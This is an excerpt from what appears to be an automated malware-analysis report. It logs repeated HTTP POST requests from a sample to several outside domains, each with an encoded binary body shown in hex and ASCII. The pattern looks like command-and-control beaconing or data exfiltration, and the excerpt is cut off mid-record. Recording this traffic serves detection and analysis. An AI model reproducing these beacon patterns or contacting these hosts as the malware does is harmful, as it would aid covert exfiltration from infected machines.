eL/acc6gapimu0AbWTEJKjFbjubO8uJe4u3WddGbLVb4SzCbhEGgOTSbgBrEHLZZjMk1XtQG5bBtU9sMtnC/oKXyMYVh4S9IfuZrt8HMlfguQwq1av7NK3Cuq59ycywyBpVIZ0+0GmWpEchOGQyHCZaGfepnyCjONLx7W4E6pWK7ptXgchtFkKJVnt+KP/+FAtnGfqkOFS5q/3ItNMJECmr0GPTYSSTsQW0edmOi464NKy3EDmpT3/nALVFBph8pwFHklfA6g+YJdxT+BUWZ3DaFc8rs/LNN3c9rGkVKFztcnpA9p5yhTd2DCv2xT8F56hkfQALjWl8VtkDXaFHj/epcDtt+XOr4LGysGHzYvCsn2zGy5j5zuUWzcB6r/f7t3XTd7oeOVs4iehddHKEnqXDnS2EcaF6kO8Mfgpbdyq7F4RFeFNT4v4lO5QybXkUw4xF/svcj9w3+/g5jxkavpSYNMhhZwsRTKrz3IbmayY5qOBxqaSDTi82Yt2gfuI9aRZv7xcvfC7dwTx4WBqz0D9YMcJIux4KKY6EuKFQF90O1h30A5QRWFz0SpzS+n2dmibXnmhTOEw==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 572User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.pr-park.comCache-Control: no-cacheData Raw: 4e 48 45 6e 69 59 4e 69 61 35 69 68 4d 63 34 34 69 69 62 75 59 61 78 48 51 38 38 70 41 34 46 65 5a 2f 43 62 45 44 47 71 47 63 35 2f 69 59 30 49 41 63 50 6a 74 47 74 48 68 71 61 59 73 79 52 5a 44 73 73 70 78 49 32 4f 71 4e 6a 70 30 66 70 33 34 7a 46 45 63 54 76 6b 58 64 48 78 62 79 74 68 43 45 6a 4a 79 52 49 68 78 32 32 6c 50 42 4a 39 73 47 4e 31 57 41 62 75 75 55 6a 73 64 49 7a 74 76 46 31 4d 33 75 64 4d 65 58 51 37 79 7a 65 52 30 50 65 79 72 31 58 54 39 43 4d 36 55 70 5a 58 6e 39 39 51 79 36 69 4a 4e 51 73 65 7a 66 44 72 66 63 39 4f 2b 65 37 4a 4a 43 46 31 62 50 2f 6f 4b 6c 35 51 69 6b 69 61 46 57 39 39 5a 39 51 45 6c 61 53 70 36 39 79 6e 61 53 2b 39 48 30 34 38 6a 6c 7a 4f 75 77 36 4b 59 37 7a 68 67 49 66 6a 59 63 56 5a 71 59 46 46 61 48 76 68 68 47 6d 68 62 42 53 51 73 34 6d 77 35 6b 32 41 2b 6d 68 53 6d 51 30 54 48 6e 35 2f 6b 36 37 37 6f 77 63 35 33 4c 68 39 6a 67 44 5a 43 71 44 4f 61 4e 6e 4a 43 2b 75 6d 49 31 6c 7a 49 6f 69 33 32 4d 49 6b 38 6b 37 51 64 75 67 64 79 65 58 6c 6b 6b 55 6c 4e 4f 52 49 30 54 44 33 49 44 4a 39 58 2b 6e 55 41 74 4c 43 2b 52 2f 73 63 59 6e 7a 4b 48 79 70 65 48 30 2b 47 36 39 76 77 4b 5a 51 76 52 65 7a 7a 51 5a 74 51 75 5a 4a 6c 54 45 75 50 67 71 4e 53 69 77 61 59 5a 6d 55 71 76 46 54 72 6f 4d 7a 6f 4d 4f 72 53 43 74 67 4c 78 56 79 30 70 67 51 35 5a 65 64 61 73 35 71 44 73 65 59 42 78 66 59 33 55 52 45 38 59 63 6b 34 39 6a 6b 35 35 36 46 6a 45 41 47 54 31 7a 78 62 31 69 58 61 47 49 63 35 52 6f 61 7a 51 33 79 65 4e 46 2b 68 43 53 72 7a 59 39 71 41 46 54 48 2f 6b 66 6d 48 67 6f 67 46 63 62 6a 46 30 43 5a 61 48 6a 41 56 59 70 7a 52 4c 57 2f 51 35 5a 63 4e 34 6d 42 53 58 68 52 32 43 4e 72 63 4b 73 47 71 4a 71 4c 49 38 73 5a 4c 6b 4e 43 61 4f 33 70 68 41 3d 3d Data Ascii: NHEniYNia5ihMc44iibuYaxHQ88pA4FeZ/CbEDGqGc5/iY0IAcPjtGtHhqaYsyRZDsspxI2OqNjp0fp34zFEcTvkXdHxbythCEjJyRIhx22lPBJ9sGN1WAbuuUjsdIztvF1M3udMeXQ7yzeR0Peyr1XT9CM6UpZXn99Qy6iJNQsezfDrfc9O+e7JJCF1bP/oKl5QikiaFW99Z9QElaSp69ynaS+9H048jlzOuw6KY7zhgIfjYcVZqYFFaHvhhGmhbBSQs4mw5k2A+mhSmQ0THn5/k677owc53Lh9jgDZCqDOaNnJC+umI1lzIoi32MIk8k7QdugdyeXlkkUlNORI0TD3IDJ9X+nUAtLC+R/scYnzKHypeH0+G69vwKZQvRezzQZtQuZJlTEuPgqNSiwaYZmUqvFTroMzoMOrSCtgLxVy0pgQ5Zedas5qDseYBxfY3URE8Yck49jk556FjEAGT1zxb1iXaGIc5RoazQ3yeNF+hCSrzY9qAFTH/kfmHgogFcbjF0CZaHjAVYpzRLW/Q5ZcN4mBSXhR2CNrcKsGqJqLI8sZLkNCaO3phA==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 536User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.quadlock.comCache-Control: no-cacheData Raw: 68 46 46 4b 67 6e 55 70 61 35 69 62 6c 4d 70 48 33 4b 7a 52 75 47 36 52 6a 50 30 44 77 69 65 46 65 63 56 68 5a 33 30 73 39 57 6e 53 47 45 72 44 33 79 61 61 6d 4c 31 39 38 76 59 5a 43 32 4c 4c 2b 54 32 46 7a 34 78 58 6f 55 6a 6b 51 76 5a 79 4a 4e 71 32 77 31 5a 75 71 44 6e 39 6b 6a 58 37 76 36 68 6a 53 45 33 64 6d 59 48 7a 48 58 6e 70 78 32 70 55 34 39 4a 72 36 37 6b 77 74 53 5a 67 53 64 4c 42 61 2b 64 51 37 78 48 30 72 65 70 4c 43 75 47 56 75 55 44 64 65 4b 4c 68 49 45 6c 45 38 6d 49 77 70 42 51 34 7a 62 35 49 32 70 38 61 69 59 36 42 64 64 62 59 31 5a 4e 37 68 53 71 36 6e 32 47 35 42 33 52 31 79 51 4a 77 44 44 58 51 6b 56 77 47 34 43 77 4f 2b 67 2f 79 77 4f 66 54 4e 2b 6b 78 35 75 30 6c 6c 54 79 31 48 33 36 30 54 62 31 37 51 59 79 77 52 48 68 4d 38 55 31 78 64 45 48 57 64 57 6b 33 70 68 6c 4e 57 6f 48 64 77 32 49 4e 4e 30 75 51 62 42 4e 36 2f 6c 6f 43 74 71 30 38 2b 44 6b 49 44 57 33 35 34 70 46 37 2f 76 38 35 69 4f 51 48 63 6c 61 73 39 47 2f 53 6e 63 42 4e 39 65 31 45 5a 6c 64 49 42 5a 38 2b 2f 66 46 53 46 55 73 7a 6b 76 39 54 47 50 68 2f 6e 2b 42 62 36 66 59 34 6f 4c 4d 77 31 53 6b 6c 79 6f 59 6b 71 79 4a 69 79 68 38 4e 70 6c 2b 44 6e 63 57 4e 30 45 63 35 75 77 50 54 35 56 69 77 72 41 37 38 64 6c 72 2f 58 47 6c 52 76 38 7a 75 67 32 36 73 6b 78 36 55 75 64 7a 67 38 41 36 50 73 42 2b 34 66 37 46 4d 30 45 66 50 6e 79 49 4b 66 69 52 72 75 58 63 6b 6a 31 7a 69 5a 52 68 44 51 6f 48 78 45 65 73 49 2b 53 55 31 77 54 62 58 4c 51 4b 6a 45 59 2f 62 43 67 51 45 4a 4a 30 51 45 4c 59 65 44 52 45 64 2f 59 63 4f 67 52 66 78 62 32 2b 65 48 34 71 41 43 38 7a 72 6c 35 4e 6c 74 7a 58 74 79 38 55 3d Data Ascii: hFFKgnUpa5iblMpH3KzRuG6RjP0DwieFecVhZ30s9WnSGErD3yaamL198vYZC2LL+T2Fz4xXoUjkQvZyJNq2w1ZuqDn9kjX7v6hjSE3dmYHzHXnpx2pU49Jr67kwtSZgSdLBa+dQ7xH0repLCuGVuUDdeKLhIElE8mIwpBQ4zb5I2p8aiY6BddbY1ZN7hSq6n2G5B3R1yQJwDDXQkVwG4CwO+g/ywOfTN+kx5u0llTy1H360Tb17QYywRHhM8U1xdEHWdWk3phlNWoHdw2INN0uQbBN6/loCtq08+DkIDW354pF7/v85iOQHclas9G/SncBN9e1EZldIBZ8+/fFSFUszkv9TGPh/n+Bb6fY4oLMw1SklyoYkqyJiyh8Npl+DncWN0Ec5uwPT5ViwrA78dlr/XGlRv8zug26skx6Uudzg8A6PsB+4f7FM0EfPnyIKfiRruXckj1ziZRhDQoHxEesI+SU1wTbXLQKjEY/bCgQEJJ0QELYeDREd/YcOgRfxb2+eH4qAC8zrl5NltzXty8U=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 552User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.valdal.comCache-Control: no-cacheData Raw: 74 70 46 42 74 30 57 43 66 5a 67 55 6e 6d 4c 63 62 41 35 7a 74 62 37 32 45 37 38 54 45 35 33 4b 53 66 73 35 53 6e 37 75 58 4f 57 52 34 44 75 4b 64 47 31 4e 34 32 72 66 4c 5a 6b 52 70 32 6c 7a 47 74 73 2b 52 2b 2b 64 4a 75 30 2b 53 68 54 73 31 6a 38 4c 75 62 76 75 45 53 51 37 38 7a 70 5a 75 39 76 48 73 6d 55 7a 43 54 44 67 7a 58 51 63 75 6f 6d 4a 72 36 79 62 5a 4d 69 72 72 32 4d 31 49 63 57 43 47 4b 4d 45 51 36 41 48 5a 54 32 30 43 65 72 2b 66 6b 2b 31 4b 32 47 47 7a 56 72 6a 36 36 48 4d 4a 48 2b 6e 2f 59 4f 39 7a 76 6b 39 2b 32 37 36 73 70 4c 79 62 56 6a 51 62 4e 79 33 4d 4f 51 42 77 55 45 56 31 59 56 72 72 77 2f 47 39 39 6e 74 56 51 73 42 77 49 70 68 6c 66 76 73 42 31 2f 61 50 7a 48 42 44 56 44 4c 43 6d 4b 2f 75 51 72 78 2f 31 4a 75 46 41 30 41 58 33 46 71 47 4c 34 68 39 49 36 4c 6b 65 75 36 59 61 48 73 62 67 4a 4b 4c 65 2b 4e 75 4a 31 6e 68 73 30 57 61 6e 34 57 55 54 58 58 2b 4b 45 65 54 65 7a 54 36 76 43 56 56 6a 6d 62 39 43 73 57 41 5a 39 74 31 2b 58 66 30 69 71 55 50 70 65 36 43 2b 30 62 42 62 71 67 31 69 57 65 4a 6a 6a 76 41 38 5a 79 55 59 70 38 6b 35 36 41 58 78 75 70 75 33 66 51 6e 7a 5a 6c 61 71 51 6d 53 78 5a 76 73 61 54 69 30 31 71 2f 55 66 6c 62 34 35 4e 36 57 78 4c 70 6b 64 54 37 34 39 6b 75 78 34 48 47 38 6e 52 4e 6f 68 78 4f 2f 4a 51 4a 71 6c 6c 46 4f 63 31 2f 37 51 30 4e 72 72 6e 51 43 70 5a 77 77 63 59 42 7a 67 64 51 5a 70 75 4a 65 6e 56 46 6d 67 57 63 51 30 4d 6b 2b 74 74 33 66 37 5a 70 79 46 61 43 76 30 68 65 2b 34 4c 69 49 6e 34 42 31 6b 62 37 6d 45 50 4c 39 69 61 57 33 2b 49 42 38 51 76 46 4d 35 4c 51 74 4c 7a 67 7a 47 70 4b 59 65 58 65 52 47 50 69 30 36 59 6e 78 76 46 74 55 6e 71 4d 34 74 6b 4b 75 7a 59 62 Data Ascii: tpFBt0WCfZgUnmLcbA5ztb72E78TE53KSfs5Sn7uXOWR4DuKdG1N42rfLZkRp2lzGts+R++dJu0+ShTs1j8LubvuESQ78zpZu9vHsmUzCTDgzXQcuomJr6ybZMirr2M1IcWCGKMEQ6AHZT20Cer+fk+1K2GGzVrj66HMJH+n/YO9zvk9+276spLybVjQbNy3MOQBwUEV1YVrrw/G99ntVQsBwIphlfvsB1/aPzHBDVDLCmK/uQrx/1JuFA0AX3FqGL4h9I6Lkeu6YaHsbgJKLe+NuJ1nhs0Wan4WUTXX+KEeTezT6vCVVjmb9CsWAZ9t1+Xf0iqUPpe6C+0bBbqg1iWeJjjvA8ZyUYp8k56AXxupu3fQnzZlaqQmSxZvsaTi01q/Uflb45N6WxLpkdT749kux4HG8nRNohxO/JQJqllFOc1/7Q0NrrnQCpZwwcYBzgdQZpuJenVFmgWcQ0Mk+tt3f7ZpyFaCv0he+4LiIn4B1kb7mEPL9iaW3+IB8QvFM5LQtLzgzGpKYeXeRGPi06YnxvFtUnqM4tkKuzYb
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 548User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.rs-ag.comCache-Control: no-cacheData Raw: 33 35 6b 6b 71 4a 38 45 66 5a 68 70 52 4e 6c 56 2f 6f 6b 6d 50 69 68 59 53 53 74 31 74 52 56 33 51 38 34 62 6e 2f 6a 67 36 68 6c 38 50 71 52 74 73 31 45 67 55 53 46 39 4e 36 56 37 43 66 79 61 66 4b 41 52 70 4a 4e 2f 72 44 65 78 35 39 42 63 55 48 67 78 39 4e 43 47 38 4d 55 42 67 47 78 77 39 6b 78 4b 4e 52 44 61 58 46 54 41 79 73 7a 6c 2f 54 78 53 69 76 51 79 6b 62 65 61 65 66 6c 47 33 4d 34 4e 6a 78 73 70 2f 49 52 66 71 7a 79 41 6e 43 33 69 53 71 4a 46 32 4e 61 39 62 32 6a 59 30 4d 4d 78 79 6d 79 47 6c 51 68 55 69 46 38 6b 66 4d 68 79 47 35 61 7a 46 7a 42 44 66 2f 68 6b 75 38 6b 2b 43 5a 6e 6d 6b 6f 79 38 68 6d 43 36 47 53 6c 6d 62 67 66 51 49 37 54 71 44 62 2b 5a 68 30 45 58 69 73 66 54 64 2b 65 5a 58 35 48 4c 2f 4f 64 75 6d 35 6e 32 49 6c 34 5a 63 75 67 67 47 7a 50 62 4b 31 39 41 61 63 63 68 4f 78 2b 79 54 66 42 4d 4a 62 4a 55 61 47 67 6c 5a 74 52 71 4b 4d 79 4b 71 6d 55 6e 31 6d 6a 63 4b 77 58 56 36 52 49 59 44 45 53 5a 46 6e 37 6a 39 33 2b 75 4a 4b 41 41 61 6e 63 53 56 78 45 52 49 73 6b 48 66 32 4f 64 6e 70 74 61 78 4f 45 43 77 2f 6c 7a 56 65 58 4f 62 31 61 6c 67 37 31 6b 42 44 37 69 53 57 36 6b 34 52 37 4c 42 4d 4e 35 4a 6a 78 4f 57 47 44 31 54 61 32 68 44 2b 37 31 48 7a 45 43 36 55 43 59 55 77 52 52 4a 63 4c 39 45 53 44 63 4b 6f 74 44 72 6b 73 6c 71 6d 2b 6c 70 4a 4c 66 65 45 6f 49 35 68 30 58 47 37 57 35 54 76 54 76 70 6b 57 42 4c 4c 49 62 5a 72 52 6b 39 74 36 31 36 78 57 70 4b 31 58 6b 65 50 48 33 5a 75 76 72 67 30 62 6d 2b 7a 37 74 43 76 73 71 69 48 30 4f 4d 63 69 6e 46 79 4d 76 61 6b 50 56 64 4d 59 37 7a 75 77 34 68 39 7a 4f 68 72 38 6b 2b 51 69 4e 4a 44 43 59 65 73 43 69 37 71 59 36 4f 31 7a 58 42 72 55 3d Data Ascii: 35kkqJ8EfZhpRNlV/okmPihYSSt1tRV3Q84bn/jg6hl8PqRts1EgUSF9N6V7CfyafKARpJN/rDex59BcUHgx9NCG8MUBgGxw9kxKNRDaXFTAyszl/TxSivQykbeaeflG3M4Njxsp/IRfqzyAnC3iSqJF2Na9b2jY0MMxymyGlQhUiF8kfMhyG5azFzBDf/hku8k+CZnmkoy8hmC6GSlmbgfQI7TqDb+Zh0EXisfTd+eZX5HL/Odum5n2Il4ZcuggGzPbK19AacchOx+yTfBMJbJUaGglZtRqKMyKqmUn1mjcKwXV6RIYDESZFn7j93+uJKAAancSVxERIskHf2OdnptaxOECw/lzVeXOb1alg71kBD7iSW6k4R7LBMN5JjxOWGD1Ta2hD+71HzEC6UCYUwRRJcL9ESDcKotDrkslqm+lpJLfeEoI5h0XG7W5TvTvpkWBLLIbZrRk9t616xWpK1XkePH3Zuvrg0bm+z7tCvsqiH0OMcinFyMvakPVdMY7zuw4h9zOhr8k+QiNJDCYesCi7qY6O1zXBrU=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 584User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.alteor.clCache-Control: no-cacheData Raw: 68 36 71 44 72 70 59 35 66 5a 67 76 30 34 65 4a 63 61 4e 69 66 7a 6b 58 66 51 55 32 50 37 56 73 4b 75 2f 44 68 6e 76 38 7a 45 4e 74 4d 4d 69 73 74 69 58 65 56 63 6f 58 77 75 44 53 38 61 77 63 61 38 50 35 67 76 32 48 2b 62 37 59 33 4d 66 68 64 6d 61 6c 70 4f 6a 77 47 4d 4f 67 68 63 7a 33 54 62 45 39 43 7a 52 6f 6b 41 73 42 47 67 38 38 4d 45 6e 38 42 78 74 32 41 4f 6c 72 6f 72 34 66 41 70 74 6e 6e 79 45 6c 5a 4c 56 37 64 77 45 76 35 55 62 2b 76 62 6d 44 53 58 54 6a 4c 59 4a 72 34 6b 52 4f 72 34 75 43 67 4c 72 6c 44 56 77 38 6f 4d 72 2f 79 71 65 53 61 61 54 75 76 35 66 67 52 43 44 30 62 55 58 72 36 62 79 6c 71 4b 35 62 56 58 31 38 4d 50 65 4e 53 79 75 53 65 78 75 43 39 55 75 62 4a 4d 6d 48 37 6c 55 62 58 45 45 77 62 79 2b 4e 6b 65 4f 75 58 37 59 6c 46 72 64 49 6a 6b 57 72 6d 69 6a 52 68 70 49 34 2b 41 72 68 70 6a 53 37 37 33 68 56 6e 43 5a 6b 34 6e 72 76 49 43 2b 35 75 6f 38 37 77 4d 39 59 57 66 4c 34 44 62 31 75 76 6d 4f 35 39 6e 78 35 56 4c 65 44 37 4e 78 4c 73 70 36 50 34 36 6d 6f 46 53 39 6c 47 54 78 32 69 57 50 66 57 50 4c 39 41 63 62 75 34 39 70 4c 2b 77 34 42 7a 69 4a 4e 39 77 45 74 4e 50 66 36 44 37 46 6d 74 58 76 71 74 2f 33 68 35 64 4a 52 59 58 34 43 41 32 4c 6b 56 2b 38 4b 63 2b 51 43 4e 71 36 71 38 47 55 36 49 53 77 49 55 62 43 4f 33 5a 4c 73 4f 44 4f 63 75 4a 61 49 35 51 71 35 61 4f 37 64 67 50 35 48 4c 38 33 71 66 49 41 4d 4a 4c 53 4c 77 2b 6b 4f 65 33 6f 6b 5a 72 61 6d 68 6c 46 43 69 56 56 50 57 39 33 77 57 35 39 78 51 45 4a 66 75 31 53 6e 76 6b 53 78 44 41 65 6c 6e 51 69 36 35 41 4d 32 50 2f 6e 52 45 48 65 6d 7a 62 69 56 6d 45 6c 38 62 6e 76 66 61 4b 44 34 61 70 35 42 62 59 45 47 4c 69 2b 44 48 73 32 74 54 4b 47 5a 44 6f 42 4f 6b 69 57 55 39 4e 61 55 4a 50 33 71 4b 67 42 54 61 49 32 44 38 37 42 72 48 77 3d 3d Data Ascii: h6qDrpY5fZgv04eJcaNifzkXfQU2P7VsKu/Dhnv8zENtMMistiXeVcoXwuDS8awca8P5gv2H+b7Y3MfhdmalpOjwGMOghcz3TbE9CzRokAsBGg88MEn8Bxt2AOlror4fAptnnyElZLV7dwEv5Ub+vbmDSXTjLYJr4kROr4uCgLrlDVw8oMr/yqeSaaTuv5fgRCD0bUXr6bylqK5bVX18MPeNSyuSexuC9UubJMmH7lUbXEEwby+NkeOuX7YlFrdIjkWrmijRhpI4+ArhpjS773hVnCZk4nrvIC+5uo87wM9YWfL4Db1uvmO59nx5VLeD7NxLsp6P46moFS9lGTx2iWPfWPL9Acbu49pL+w4BziJN9wEtNPf6D7FmtXvqt/3h5dJRYX4CA2LkV+8Kc+QCNq6q8GU6ISwIUbCO3ZLsODOcuJaI5Qq5aO7dgP5HL83qfIAMJLSLw+kOe3okZramhlFCiVVPW93wW59xQEJfu1SnvkSxDAelnQi65AM2P/nREHemzbiVmEl8bnvfaKD4ap5BbYEGLi+DHs2tTKGZDoBOkiWU9NaUJP3qKgBTaI2D87BrHw==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 552User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.valdal.comCache-Control: no-cacheData Raw: 74 70 46 42 74 30 57 43 66 5a 67 55 6e 6d 4c 63 62 41 35 7a 74 62 37 32 45 37 38 54 45 35 33 4b 53 66 73 35 53 6e 37 75 58 4f 57 52 34 44 75 4b 64 47 31 4e 34 32 72 66 4c 5a 6b 52 70 32 6c 7a 47 74 73 2b 52 2b 2b 64 4a 75 30 2b 53 68 54 73 31 6a 38 4c 75 62 76 75 45 53 51 37 38 7a 70 5a 75 39 76 48 73 6d 55 7a 43 54 44 67 7a 58 51 63 75 6f 6d 4a 72 36 79 62 5a 4d 69 72 72 32 4d 31 49 63 57 43 47 4b 4d 45 51 36 41 48 5a 54 32 30 43 65 72 2b 66 6b 2b 31 4b 32 47 47 7a 56 72 6a 36 36 48 4d 4a 48 2b 6e 2f 59 4f 39 7a 76 6b 39 2b 32 37 36 73 70 4c 79 62 56 6a 51 62 4e 79 33 4d 4f 51 42 77 55 45 56 31 59 56 72 72 77 2f 47 39 39 6e 74 56 51 73 42 77 49 70 68 6c 66 76 73 42 31 2f 61 50 7a 48 42 44 56 44 4c 43 6d 4b 2f 75 51 72 78 2f 31 4a 75 46 41 30 41 58 33 46 71 47 4c 34 68 39 49 36 4c 6b 65 75 36 59 61 48 73 62 67 4a 4b 4c 65 2b 4e 75 4a 31 6e 68 73 30 57 61 6e 34 57 55 54 58 58 2b 4b 45 65 54 65 7a 54 36 76 43 56 56 6a 6d 62 39 43 73 57 41 5a 39 74 31 2b 58 66 30 69 71 55 50 70 65 36 43 2b 30 62 42 62 71 67 31 69 57 65 4a 6a 6a 76 41 38 5a 79 55 59 70 38 6b 35 36 41 58 78 75 70 75 33 66 51 6e 7a 5a 6c 61 71 51 6d 53 78 5a 76 73 61 54 69 30 31 71 2f 55 66 6c 62 34 35 4e 36 57 78 4c 70 6b 64 54 37 34 39 6b 75 78 34 48 47 38 6e 52 4e 6f 68 78 4f 2f 4a 51 4a 71 6c 6c 46 4f 63 31 2f 37 51 30 4e 72 72 6e 51 43 70 5a 77 77 63 59 42 7a 67 64 51 5a 70 75 4a 65 6e 56 46 6d 67 57 63 51 30 4d 6b 2b 74 74 33 66 37 5a 70 79 46 61 43 76 30 68 65 2b 34 4c 69 49 6e 34 42 31 6b 62 37 6d 45 50 4c 39 69 61 57 33 2b 49 42 38 51 76 46 4d 35 4c 51 74 4c 7a 67 7a 47 70 4b 59 65 58 65 52 47 50 69 30 36 59 6e 78 76 46 74 55 6e 71 4d 34 74 6b 4b 75 7a 59 62 Data Ascii: tpFBt0WCfZgUnmLcbA5ztb72E78TE53KSfs5Sn7uXOWR4DuKdG1N42rfLZkRp2lzGts+R++dJu0+ShTs1j8LubvuESQ78zpZu9vHsmUzCTDgzXQcuomJr6ybZMirr2M1IcWCGKMEQ6AHZT20Cer+fk+1K2GGzVrj66HMJH+n/YO9zvk9+276spLybVjQbNy3MOQBwUEV1YVrrw/G99ntVQsBwIphlfvsB1/aPzHBDVDLCmK/uQrx/1JuFA0AX3FqGL4h9I6Lkeu6YaHsbgJKLe+NuJ1nhs0Wan4WUTXX+KEeTezT6vCVVjmb9CsWAZ9t1+Xf0iqUPpe6C+0bBbqg1iWeJjjvA8ZyUYp8k56AXxupu3fQnzZlaqQmSxZvsaTi01q/Uflb45N6WxLpkdT749kux4HG8nRNohxO/JQJqllFOc1/7Q0NrrnQCpZwwcYBzgdQZpuJenVFmgWcQ0Mk+tt3f7ZpyFaCv0he+4LiIn4B1kb7mEPL9iaW3+IB8QvFM5LQtLzgzGpKYeXeRGPi06YnxvFtUnqM4tkKuzYb
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 588User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.pdqhomes.comCache-Control: no-cacheData Raw: 65 4c 2f 61 63 63 36 67 61 70 69 6d 75 30 41 62 57 54 45 4a 4b 6a 46 62 6a 75 62 4f 38 75 4a 65 34 75 33 57 64 64 47 62 4c 56 62 34 53 7a 43 62 68 45 47 67 4f 54 53 62 67 42 72 45 48 4c 5a 5a 6a 4d 6b 31 58 74 51 47 35 62 42 74 55 39 73 4d 74 6e 43 2f 6f 4b 58 79 4d 59 56 68 34 53 39 49 66 75 5a 72 74 38 48 4d 6c 66 67 75 51 77 71 31 61 76 37 4e 4b 33 43 75 71 35 39 79 63 79 77 79 42 70 56 49 5a 30 2b 30 47 6d 57 70 45 63 68 4f 47 51 79 48 43 5a 61 47 66 65 70 6e 79 43 6a 4f 4e 4c 78 37 57 34 45 36 70 57 4b 37 70 74 58 67 63 68 74 46 6b 4b 4a 56 6e 74 2b 4b 50 2f 2b 46 41 74 6e 47 66 71 6b 4f 46 53 35 71 2f 33 49 74 4e 4d 4a 45 43 6d 72 30 47 50 54 59 53 53 54 73 51 57 30 65 64 6d 4f 69 34 36 34 4e 4b 79 33 45 44 6d 70 54 33 2f 6e 41 4c 56 46 42 70 68 38 70 77 46 48 6b 6c 66 41 36 67 2b 59 4a 64 78 54 2b 42 55 57 5a 33 44 61 46 63 38 72 73 2f 4c 4e 4e 33 63 39 72 47 6b 56 4b 46 7a 74 63 6e 70 41 39 70 35 79 68 54 64 32 44 43 76 32 78 54 38 46 35 36 68 6b 66 51 41 4c 6a 57 6c 38 56 74 6b 44 58 61 46 48 6a 2f 65 70 63 44 74 74 2b 58 4f 72 34 4c 47 79 73 47 48 7a 59 76 43 73 6e 32 7a 47 79 35 6a 35 7a 75 55 57 7a 63 42 36 72 2f 66 37 74 33 58 54 64 37 6f 65 4f 56 73 34 69 65 68 64 64 48 4b 45 6e 71 58 44 6e 53 32 45 63 61 46 36 6b 4f 38 4d 66 67 70 62 64 79 71 37 46 34 52 46 65 46 4e 54 34 76 34 6c 4f 35 51 79 62 58 6b 55 77 34 78 46 2f 73 76 63 6a 39 77 33 2b 2f 67 35 6a 78 6b 61 76 70 53 59 4e 4d 68 68 5a 77 73 52 54 4b 72 7a 33 49 62 6d 61 79 59 35 71 4f 42 78 71 61 53 44 54 69 38 32 59 74 32 67 66 75 49 39 61 52 5a 76 37 78 63 76 66 43 37 64 77 54 78 34 57 42 71 7a 30 44 39 59 4d 63 4a 49 75 78 34 4b 4b 59 36 45 75 4b 46 51 46 39 30 4f 31 68 33 30 41 35 51 52 57 46 7a 30 53 70 7a 53 2b 6e 32 64 6d 69 62 58 6e 6d 68 54 4f 45 77 3d 3d Data Ascii: eL/acc6gapimu0AbWTEJKjFbjubO8uJe4u3WddGbLVb4SzCbhEGgOTSbgBrEHLZZjMk1XtQG5bBtU9sMtnC/oKXyMYVh4S9IfuZrt8HMlfguQwq1av7NK3Cuq59ycywyBpVIZ0+0GmWpEchOGQyHCZaGfepnyCjONLx7W4E6pWK7ptXgchtFkKJVnt+KP/+FAtnGfqkOFS5q/3ItNMJECmr0GPTYSSTsQW0edmOi464NKy3EDmpT3/nALVFBph8pwFHklfA6g+YJdxT+BUWZ3DaFc8rs/LNN3c9rGkVKFztcnpA9p5yhTd2DCv2xT8F56hkfQALjWl8VtkDXaFHj/epcDtt+XOr4LGysGHzYvCsn2zGy5j5zuUWzcB6r/f7t3XTd7oeOVs4iehddHKEnqXDnS2EcaF6kO8Mfgpbdyq7F4RFeFNT4v4lO5QybXkUw4xF/svcj9w3+/g5jxkavpSYNMhhZwsRTKrz3IbmayY5qOBxqaSDTi82Yt2gfuI9aRZv7xcvfC7dwTx4WBqz0D9YMcJIux4KKY6EuKFQF90O1h30A5QRWFz0SpzS+n2dmibXnmhTOEw==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 580User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.baijaku.comCache-Control: no-cacheData Raw: 63 53 37 2f 59 35 30 74 61 70 67 63 66 77 36 73 31 4e 4a 55 76 4e 61 7a 4a 43 4e 4c 7a 53 59 43 49 58 42 36 34 74 6e 65 57 34 30 4f 65 61 37 79 63 48 51 65 58 55 62 66 58 4c 45 46 56 73 34 6f 76 64 56 35 6e 4a 62 50 5a 48 57 4e 6b 45 73 6a 33 38 6b 77 70 46 57 75 54 44 4d 34 6c 63 48 30 43 50 4c 65 68 47 6c 47 32 50 37 44 48 50 43 77 56 75 31 69 74 2f 75 52 52 38 6a 58 47 5a 64 42 6d 67 52 41 55 53 4b 44 37 4d 7a 45 34 78 5a 4c 62 46 32 38 49 41 39 37 79 7a 55 4d 49 65 6f 44 70 34 49 58 63 4c 61 64 6d 34 66 37 34 52 4d 68 69 31 72 4a 62 38 61 6b 63 79 6e 42 43 33 4a 5a 36 36 47 62 78 46 4e 71 63 55 63 66 5a 47 6e 71 54 46 65 55 30 50 68 6f 43 39 49 2b 43 61 2f 57 61 2f 32 70 59 49 61 6d 51 4e 32 6d 51 48 31 4a 57 52 52 7a 47 45 35 58 36 35 31 6d 37 4c 78 51 53 54 65 33 39 59 33 75 57 55 70 33 46 65 2b 5a 63 6e 66 42 48 54 67 39 34 39 48 74 50 30 67 2f 6a 6c 7a 73 61 30 72 58 4d 4a 67 64 2f 74 38 6e 62 35 67 79 4d 78 54 